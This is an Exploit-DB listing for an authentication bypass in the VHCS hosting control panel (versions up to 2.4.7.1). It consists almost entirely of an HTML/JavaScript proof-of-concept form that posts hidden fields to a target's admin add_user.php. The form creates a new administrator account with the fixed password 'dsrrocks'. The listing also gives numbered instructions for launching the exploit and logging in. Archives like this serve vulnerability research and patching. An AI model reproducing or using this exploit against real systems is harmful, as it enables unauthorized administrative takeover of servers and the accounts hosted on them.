VHCS <= 2.4.7.1 Add User Authentication Bypass Exploit

2006-02-23T00:00:00
ID EDB-ID:1524
Type exploitdb
Reporter RoMaNSoFt
Modified 2006-02-23T00:00:00

Description

VHCS <= 2.4.7.1 (Add User) Authentication Bypass Exploit. Webapps exploit for php platform

                                        
                                            &lt;html&gt;

&lt;head&gt;
&lt;title&gt;VHCS (version &lt;= 2.4.7.1) PoC. &nbsp;By RoMaNSoFt&lt;/title&gt;
&lt;script language="JavaScript"&gt;
function submitform()
{
  if (document.admin_add_user.username.value=='admin')
  {
    alert('Learn to read before launching an exploit, script-kiddie!');
    exit();
  }
  
  document.admin_add_user.action=document.admin_add_user.target.value;
  document.admin_add_user.submit();
}
&lt;/script&gt;
&lt;/head&gt;

&lt;body&gt;
  &lt;hr&gt;
  &lt;center&gt;
  	&lt;b&gt;VHCS (version &lt;= 2.4.7.1) PoC. &nbsp;By RoMaNSoFt &#60roman&#64rs-labs.com&#62 &nbsp;[08.Feb.2006]&lt;/b&gt;

  &lt;/center&gt;
  &lt;hr&gt;
  
	&lt;form name="admin_add_user" method="post" action=""&gt;
            &lt;table width="100%" cellpadding="5" cellspacing="5"&gt;
              &lt;tr&gt;
                &lt;td width="20"&gt;&nbsp;&lt;/td&gt;
                &lt;td colspan="2"&gt;
                  &nbsp;
                &lt;/td&gt;

              &lt;/tr&gt;
              &lt;tr&gt;
                &lt;td width="20"&gt;&nbsp;&lt;/td&gt; &lt;td width="200"&gt;Target URL&lt;/td&gt;
                &lt;td&gt; 
                  &lt;input type="text" name="target" value="http://&lt;target&gt;/vhcs2/admin/add_user.php" style="width:400px"&gt;
                &lt;/td&gt;
              &lt;/tr&gt;
              
              &lt;tr&gt;

                &lt;td width="20"&gt;&nbsp;&lt;/td&gt; &lt;td width="200"&gt;Username&lt;/td&gt;
                &lt;td&gt; 
                  &lt;input type="text" name="username" value="admin" style="width:200px"&gt;&nbsp;(should NOT exist)
                &lt;/td&gt;
              &lt;/tr&gt;
              &lt;tr&gt; 
                &lt;td&gt;&nbsp;&lt;/td&gt;
                &lt;td colspan="2"&gt;&lt;a href="javascript: submitform()"&gt;Exploit it!&lt;/a&gt;&lt;/td&gt;              
              &lt;/tr&gt;

              &lt;tr&gt; 
                &lt;td colspan="3"&gt;&nbsp; 
                  &lt;/td&gt;
              &lt;/tr&gt;
            &lt;/table&gt;
            &lt;input type="hidden" name="pass" value="dsrrocks"&gt;
            &lt;input type="hidden" name="pass_rep" value="dsrrocks"&gt;
            &lt;input type="hidden" name="email" value="vhcs-exploit@rs-labs.com"&gt;
            &lt;input type="hidden" name="uaction" value="add_user"&gt;
        &lt;/form&gt;

        
        &lt;hr&gt;
        &lt;br&gt;
        &lt;u&gt;Quick instructions&lt;/u&gt;.-&lt;br&gt;
        &lt;br&gt;
        1.- Enable JavaScript. Fill in the form with appropiate target URL (usually you will only need to replace &#60target&#62 string) and username.&lt;br&gt;
        2.- Remember not to use a probably existing username (such as "admin").&lt;br&gt;

        3.- Launch the exploit. &lt;i&gt;If target system is vulnerable, a new VHCS admin user will be created&lt;/i&gt; ;-)&lt;br&gt;
        4.- You will be redirected to VHCS login page. Try to login with your brand new username.&lt;br&gt;
        5.- Ummm, I forgot it... The password is: &lt;b&gt;dsrrocks&lt;/b&gt;.&lt;br&gt;

        &lt;br&gt;

        &lt;u&gt;More info (analysis, fix, etc)&lt;/u&gt;.-&lt;br&gt;
        &lt;br&gt;
        See &lt;a href=http://www.rs-labs.com/adv/RS-Labs-Advisory-2006-1.txt&gt;&lt;i&gt;RS-2006-1&lt;/i&gt;&lt;/a&gt;.&lt;br&gt;
				&lt;br&gt;
				&lt;hr&gt;
&lt;/body&gt;

&lt;/html&gt;

# milw0rm.com [2006-02-23]